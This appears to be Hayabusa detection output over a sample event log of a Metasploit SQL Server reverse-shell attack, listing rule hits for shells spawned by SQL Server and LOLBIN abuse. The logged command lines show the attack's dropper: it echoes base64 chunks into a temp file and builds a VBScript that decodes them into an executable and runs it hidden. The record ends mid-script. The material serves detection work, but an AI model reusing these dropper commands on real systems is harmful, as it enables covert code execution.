CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.341 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 
Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.618 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x568 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.618 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.618 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.620 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.896 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x12a4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.896 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.896 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.898 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.169 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa30 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.169 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.169 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.172 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.444 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEACQQAAEgAAABgUAEAaAcAAAAAAAAAAAAAAAAAAAAAAABoBzQAAABWAFMAXwBW>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.444 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.444 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.446 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.718 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9b8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.718 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.718 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in 
CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.720 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.991 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe90 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.991 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.991 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.994 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 
Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.266 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3bc | User: Svc-SQL-DB01 | LID: 
0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.266 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.266 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.268 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.540 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\feyQV.b64 & echo Set fs = CreateObject(""Scripting.FileSystemObject"") >>%TEMP%\UbdXv.vbs & echo Set file = fs.GetFile(""%TEMP%\feyQV.b64"") >>%TEMP%\UbdXv.vbs & echo If file.Size Then >>%TEMP%\UbdXv.vbs & echo Set fd = fs.OpenTextFile(""%TEMP%\feyQV.b64"", 1) >>%TEMP%\UbdXv.vbs & echo data = fd.ReadAll >>%TEMP%\UbdXv.vbs & echo data = Replace(data, vbCrLf, """") >>%TEMP%\UbdXv.vbs & echo data = base64_decode(data) >>%TEMP%\UbdXv.vbs & echo fd.Close >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1294 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.540 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.540 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.542 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.815 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Set ofs = CreateObject(""Scripting.FileSystemObject"").OpenTextFile(""%TEMP%\TVupu.exe"", 2, True) >>%TEMP%\UbdXv.vbs & echo ofs.Write data >>%TEMP%\UbdXv.vbs & echo ofs.close >>%TEMP%\UbdXv.vbs & echo Set shell = CreateObject(""Wscript.Shell"") >>%TEMP%\UbdXv.vbs & echo shell.run ""%TEMP%\TVupu.exe"", 0, false >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo Wscript.Echo ""The file is empty."" >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\UbdXv.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\UbdXv.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\UbdXv.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\UbdXv.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\UbdXv.vbs & echo w3 = 